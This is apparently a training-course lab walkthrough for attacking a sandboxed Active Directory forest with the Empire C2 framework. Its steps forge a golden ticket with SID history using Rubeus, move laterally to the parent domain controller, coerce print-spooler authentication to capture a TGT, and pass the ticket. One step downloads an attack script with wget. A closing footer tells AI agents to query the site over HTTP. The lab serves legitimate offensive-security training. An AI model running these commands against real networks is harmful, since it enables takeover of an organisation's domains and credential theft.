# Lab 4: Hopping Trusts - Parent Child and Tree-Root

In this lab we will be interacting with the agent we spawned in Lab 3 on the domain controller of sandbox. Please refer to Lab 3 if you have no agents to get instructions on how to spawn a new one.

In this lab you will:

* Use the krbtgt hash obtained in lab 3 to create a golden ticket with SID history
* laterally move to the domain controller of pwnzone
* use Rubeus monitor mode to monitor for incoming TGTs
* use coerced authentication through the print spooler service to trigger an authentication from treasureisland to pwnzone
* import the KRBTGT of the DC of treasureisland
* laterally move to the treasureisland DC

***

1. Now that we have the KRBTGT hash of sandbox.pwnzone.lab, we will also need the SID of pwnzone.lab. We can get the SID of the domain by enumerating domain trusts, which is a built-in post exploitation module in Empire.  Interact with the agent that you have running as svc\_entrypoint and select the following post exploitation module: \
   \
   `powershell_situational_awareness_network_powerview_get_domain_trust`\
   \
   set the API parameter to "true"\ <br>

   <figure><img src="/files/gUrRRzmMVscTGwOEfiYU" alt=""><figcaption></figcaption></figure>
2. Take note of the SID of pwnzone.lab, we will need this for our next step.&#x20;

<figure><img src="/files/J7ZKn5bZrzdm8S9bnkVs" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
replace the sections between <> with relevant parameters from previous steps.
{% endhint %}

3. Time to create a golden ticket with SID history, in your agent we will have to use Rubeus once again \
   \
   `csharp_assembly_assembly`\
   \
   file: select rubeus from the dropdown list\
   parameters: \
   golden /aes256: \<replace with krbtgt aes256 hash> /user:administrator /domain:sandbox.pwnzone.lab /ldap /sids:\<replace with sid of pwnzonelab>-519 /newpac /ptt

<figure><img src="/files/S75yLuKFmkeH3HhN6UKW" alt=""><figcaption></figcaption></figure>

4. If everything went smoothly, we should see a successful ticket import in our tasks tab output from our last command.\ <br>

   <figure><img src="/files/JY5DgbrKiemsNWz16ShO" alt=""><figcaption></figcaption></figure>
5. With the new ticket imported, we can now laterally move to the domain controller of pwnzone.lab. In our Empire agent's interact tab select \
   \
   `powershell_lateral_movement_invoke_psremoting`\
   \
   listener: \<select from dropdown>\
   computername: pwnzone-dc01.pwnzone.lab

<figure><img src="/files/nqELuZbVXnp3H9zQW76U" alt=""><figcaption></figcaption></figure>

6. Repeat step 5, as we will need 2 agents on the parent domain controller for later exploitation.<br>
7. You now have 2 new agents on the parent domain controller, it's time to hop to our treasureisland domain.  \
   on one of your 2 agents we will run Rubeus in monitoring mode, on the other one we will need to coerce authentication. \
   \
   Before we do that, we will need one more tool. Open up a terminal and type the following command: \
   \
   `wget -O Invoke-SpoolSample.ps1` [`https://raw.githubusercontent.com/jfmaes/SEC565-Tools/refs/heads/main/Invoke-SpoolSample.ps1`](https://raw.githubusercontent.com/jfmaes/SEC565-Tools/refs/heads/main/Invoke-SpoolSample.ps1) \
   \
   keep note of the file location where you saved the Invoke-SpoolSample.ps1 as you will need this in a few moments.<br>

{% hint style="info" %}
the runfor parameter indicates how much time you have to trigger the coerced authentication. If you need more time than 2 minutes (120 seconds)  to switch agents and execute the coerce attack, feel free to increase the runfor timer. Do note that you will not be able to open the output until the timer is expired, so don't set it too high either!
{% endhint %}

6. In one of your Empire agents (keep note which one), run Rubeus in monitoring mode:\
   `csharp_assembly_assembly`\
   \
   file: select rubeus from the dropdown list\
   parameters:&#x20;

   monitor /targetuser:treasure-dc01$ /interval:2 /runfor:120 /consoleoutfile:C:\Users\Public\ticket.txt /nowrap<br>

7. In your **other empire agent on the DC** run the coerced authentication attack:<br>

   <figure><img src="/files/xji3kgpfXmvGGMHaI9wl" alt=""><figcaption></figcaption></figure>

8. Check the output tab to see if the coerced authentication was triggered:<br>

   <figure><img src="/files/bqbvTFRDeMciqjUZmoPf" alt=""><figcaption></figcaption></figure>

9. Go to the File Browser tab and navigate to C:\Users\Public\ticket.txt - right click and select download.&#x20;

<figure><img src="/files/81QX8Sv0otFuuQwuZQad" alt=""><figcaption></figcaption></figure>

10. Check your empire server terminal window for information on your download. If you see download errors, that means that Rubeus is still in monitor mode and therefore the file is currently locked. You will have to wait a few more seconds (or however long you put your runfor parameter) until Rubeus is done. \ <br>

    <figure><img src="/files/2iZ0vFOLgsDw4XaMsnwY" alt=""><figcaption></figcaption></figure>
11. open up a new terminal window and navigate to the location that is displayed by your empire logs\
    \
    `cd <your location of ticket.txt>`
12. cat the output, it will look similar to this

<figure><img src="/files/ibohdop5h7U6sp9Pr7l8" alt=""><figcaption></figcaption></figure>

13. copy the base64 encoded ticket (starts with do, ends with ==)<br>
14. In your agent interact window, once again leverage Rubeus to pass the ticket. \
    \
    csharp\_assembly\_assembly\
    File: select Rubeus from dropdown\
    Parameters: ptt /ticket:\<your base64 encoded ticket>

<figure><img src="/files/oqicZnWOTg9NpGJzSwU4" alt=""><figcaption></figcaption></figure>

15. Check the output window to see if the ticket got imported successfully

<figure><img src="/files/Ts40hXxlG7cdywh8quXv" alt=""><figcaption></figcaption></figure>

This is as far as we can go in the lab, perhaps you can figure out how to get to treasureisland? ;) \
\
Hope you had fun, feel free to keep exploring and hope to see you in SEC565 at some point in the future :D&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sec565.gitbook.io/ad-privesc-with-empire/lab-4-hopping-trusts-parent-child-and-tree-root.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.